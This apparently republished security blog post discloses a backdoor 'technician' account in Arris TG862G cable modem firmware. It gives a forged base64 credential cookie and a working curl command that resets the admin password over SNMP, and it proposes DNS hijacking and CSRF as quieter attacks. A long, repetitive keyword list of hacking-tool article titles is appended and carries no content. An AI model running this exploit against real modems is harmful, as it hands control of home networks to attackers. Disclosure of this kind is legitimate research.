Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Related articles

1. Hacker Tool Kit
2. Hacking Tools Usb
3. Hack Apps
4. Pentest Tools Website Vulnerability
5. Hacker Tools Apk Download
6. Hacking Tools And Software
7. Hacker Tools Github
8. Hacker Tools For Ios
9. Pentest Tools Tcp Port Scanner
10. Nsa Hacker Tools
11. Hack And Tools
12. Hackers Toolbox
13. Hack Tool Apk
14. Hacker Techniques Tools And Incident Handling
15. Hacking Tools Name
16. Pentest Tools For Ubuntu
17. How To Hack
18. Hacker Tools For Ios
19. Hack Tool Apk
20. How To Install Pentest Tools In Ubuntu
21. Hack Tools For Windows
22. Growth Hacker Tools
23. Hacker Tools For Mac
24. Hack Tools Mac
25. Hackers Toolbox
26. Top Pentest Tools
27. Pentest Tools Subdomain
28. Hack Tools For Ubuntu
29. Pentest Tools Android
30. Pentest Tools Android
31. Hack Tools
32. Pentest Tools Online
33. Pentest Recon Tools
34. Underground Hacker Sites
35. Pentest Tools Windows
36. Wifi Hacker Tools For Windows
37. Hacker Tool Kit
38. Pentest Tools
39. Pentest Tools Subdomain
40. Hacking Tools
41. Install Pentest Tools Ubuntu
42. Hacking Tools For Windows 7
43. Android Hack Tools Github
44. Hacking Tools For Pc
45. Free Pentest Tools For Windows
46. Hacker Tools Windows
47. Tools Used For Hacking
48. Pentest Tools Kali Linux
49. Pentest Tools Android
50. Ethical Hacker Tools
51. Hackrf Tools
52. Easy Hack Tools
53. Pentest Tools Subdomain
54. Hack Website Online Tool
55. Hacking Tools For Windows
56. Hacking Tools Online
57. Hacker Techniques Tools And Incident Handling
58. Hack Tools For Ubuntu
59. Best Hacking Tools 2019
60. Hacker Tools Apk Download
61. Pentest Tools Bluekeep
62. Nsa Hack Tools Download
63. Tools For Hacker
64. Underground Hacker Sites
65. Blackhat Hacker Tools
66. Kik Hack Tools
67. Hacker Tools For Pc
68. New Hacker Tools
69. Android Hack Tools Github
70. Github Hacking Tools
71. How To Hack
72. Hacker Techniques Tools And Incident Handling
73. World No 1 Hacker Software
74. Hacking Tools For Windows
75. Hacking Tools Kit
76. Hack Tools Download
77. World No 1 Hacker Software
78. Easy Hack Tools
79. Hack And Tools
80. Hacking Tools For Windows 7
81. Best Hacking Tools 2019
82. Hacker Tools Free Download
83. Hacker Tools Windows
84. Free Pentest Tools For Windows
85. Pentest Tools
86. Nsa Hack Tools
87. Tools For Hacker
88. Hacking Tools Software
89. How To Make Hacking Tools
90. Pentest Tools Website
91. Usb Pentest Tools
92. How To Install Pentest Tools In Ubuntu
93. Pentest Tools For Windows
94. Hacker Tools Free Download
95. Hacker Tool Kit
96. Hack Tools For Windows
97. Hacking Tools Github
98. Free Pentest Tools For Windows
99. Hacker Tools For Mac
100. Hacker Tools 2020
101. Pentest Tools List
102. Hacking Tools For Windows Free Download
103. Hacking Tools For Beginners
104. Best Hacking Tools 2020
105. Hack Tool Apk No Root
106. Hak5 Tools
107. Hacking Tools Online
108. Pentest Tools Android
109. Pentest Tools Bluekeep
110. Ethical Hacker Tools
111. Hacker Tools Free Download
112. Hack Tools For Mac
113. Hack App
114. Hacker Tools List
115. How To Make Hacking Tools
116. Best Pentesting Tools 2018
117. Hacker Techniques Tools And Incident Handling
118. Blackhat Hacker Tools
119. Hacker Tools Apk
120. Pentest Tools Apk
121. Pentest Tools Kali Linux
122. Hacking Tools
123. Hacker Tools 2019
124. Tools Used For Hacking
125. Pentest Tools Website
126. Wifi Hacker Tools For Windows
127. Nsa Hack Tools
128. Hacker Tools For Windows
129. Pentest Tools Url Fuzzer
130. Pentest Automation Tools
131. New Hacker Tools
132. Pentest Tools Framework
133. How To Install Pentest Tools In Ubuntu
134. Pentest Tools
135. Hacker Hardware Tools
136. Hak5 Tools
137. What Are Hacking Tools
138. Pentest Tools Bluekeep
139. Pentest Tools Linux
140. Hacking Tools Software
141. Hack Tools Online
142. Hacker Tools Hardware
143. Pentest Tools Website
144. Tools Used For Hacking
145. Hacker Tools For Windows
146. Hack Tools For Pc
147. What Are Hacking Tools
148. Game Hacking
149. Hacker Techniques Tools And Incident Handling
150. Hacker Hardware Tools
151. How To Install Pentest Tools In Ubuntu
152. Hacker Tools Online
153. Hack Tools For Ubuntu
154. Hacking Tools For Beginners
155. Hacking Tools 2020
156. How To Hack
157. Hack Tools Download
158. Pentest Tools
159. Best Pentesting Tools 2018
160. Install Pentest Tools Ubuntu
161. Hack Tools Download
162. Hack Tools 2019
163. Hack Tools For Ubuntu
164. Hacking Tools For Windows
165. Game Hacking
166. Pentest Tools Tcp Port Scanner